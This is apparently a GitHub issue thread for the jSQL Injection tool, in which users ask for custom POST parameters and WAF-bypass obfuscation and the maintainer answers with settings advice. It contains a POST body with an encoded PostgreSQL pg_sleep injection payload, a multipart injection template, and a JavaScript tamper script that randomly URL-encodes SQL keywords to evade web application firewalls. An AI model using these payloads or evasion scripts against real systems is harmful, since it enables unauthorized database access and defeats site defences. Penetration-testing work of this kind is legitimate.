like we have option to use costume parameter because my payload header is long just add option to support parameter costume because many injection has have full post payload like this agama=6&agama=6&alamat_kantor=23456&jabatan=123456&jns_klmin=0&kode_reg=123456&nama=123456&nama_user=admin%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%280%29%29%3A%3Atext%3E%270&npwp=123456&pangkat=122&pangkat=122&password=KpNTNrZm&pendidikan=10&pendidikan=10&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pwd1=pwd1&telpon_kantor=admin&telpon_rumah=admin&tempat_lahir=123456&tgl_lahir=2025-02-23&unit_kerja=admin this is full payload parameter post

[ron190]

• @selectfromblackhydra I review the payloads you sent previously but no payload seems new, thanks anyway 👍

• @mrdragonblack multipart should work with proper settings, select method POST, also carefully set the boundary value and expand the textfield to correctly set the newline chars, also if needed set the star * where injection should work :

Request :
--boundary\nContent-Disposition: form-data; name="name"\n\n'*\n--boundary--

Header :
Content-Type: multipart/form-data;boundary=boundary

• @selectfromblackhydra either set the star * at param nama_user=-1'*, or move param nama_user at the end of params list, or check Preference option Injection > URL parameters > Inject every Request parameters. Also expand the textfield to manage params easily.

[selectfromblackhydra]

hey ron can you add SQL obsf like A+N+D SLE/**/EP random obsf example 1AND1 OR 1A+N+D1 S+E+L+E+C+T SE//LE//C//T i test in fortinet and its bypass and add like mysql schema(), user(), current_user for oracle ora_database_name, user for mssql db_id(), db_name(db_id()), for portgress current_schema(), session_user, user as fallback if common function sql engine is block by WAF can you add more SLEEP method like MySQL mssql oracle portgres sleep AND OR XOR and more like SQLMAP and stack query and boolean can you add this it would be great for you tool thank you

[ron190]

@selectfromblackhydra WAF bypass is often a manual task even when using other tools like sqlmap I guess.

In that regard you can define a custom script in Preferences to split every words and bypass WAF. Open Preferences > Tampering > Custom tamper and paste any JavaScript code to transform the query (show the code below). You can just customize or create your own method depending on your needs.

Here I used Copilot/Chatgpt to quickly create the method replaceCharWithURLEncoding() and paste it in jSQL to test it and get the following result (e.g mysql) :

Origin query: select 1,(select concat(0x53714c69,ifnull(mid((select group_concat(0x04,r,0x05,q,0x04...

Query transformed by tamper script: sel%65ct 1%2c%28sel%65ct conc%61t%280x%353714c69%2cifn%75ll%28...

Show code (copy/paste in Custom tamper, created by Copilot)

function replaceCharWithURLEncoding(str) {
  return str.split(/\b/).map(function(word) {
    // Consider only words with length > 2 (since we exclude first and last character)
    if (/^\w+$/.test(word)) {
      // Random index (not first/last)
      var idx = Math.floor(Math.random() * word.length);
      var char = word[idx];
      var encoded = '%' + char.charCodeAt(0).toString(16).toUpperCase();
      // Replace the character at idx
      return word.slice(0, idx) + encoded + word.slice(idx + 1);
    }
    return word;
  }).join('');
}

var tampering = function(sql) {
    return replaceCharWithURLEncoding(sql);
}

Screenshot of working tamper script

---

A+N+D SLE/**/EP random obsf example 1AND1 OR 1A+N+D1 S+E+L+E+C+T SE//LE//C//T i test in fortinet and its bypass

SQL statements like A+N+D SLE/**/EP SE//LE//C//T are not valid for SQL engines, I would need more feedback on the target SQL engine to test and add new obfuscation tampers. Or is this syntax replaced by the WAF ?

In any case you can create a custom script matching your need, and I will add it when receiving more feedback from other users.

---

add like mysql schema(), user(), current_user for oracle ora_database_name, user for mssql db_id(), db_name(db_id()), for portgress current_schema(), session_user, user as fallback if common function sql engine is block by WAF

Fallback is possible though the easiest to do when blocked by WAF is the following :

• either disable option Disable search of database name, version and user metadata in Preferences > Injection
• or replace the forbidden keyword in SQL Engine > Structure > Metadata

---

can you add more SLEEP method like MySQL mssql oracle portgres sleep

The strategy that uses the sleep capability is already available as Time for those databases.

Can you share the missing SQL syntax you wanted to add ?

---

stack query and boolean can you add this

Strategies stack and boolean are already available with the respective names :

• Stack
• Blind bin for boolean binary search
• Blind bit for boolean bit query

Can you share the missing SQL syntax you wanted to add ?

---

AND OR XOR and more like SQLMAP and

Statements AND OR are already implemented (see in SQL Engine > Blind > AND OR Stack modes), I don't know the benefit usage of XOR, I'll check what it's for.

Thanks for the feedbacks 👍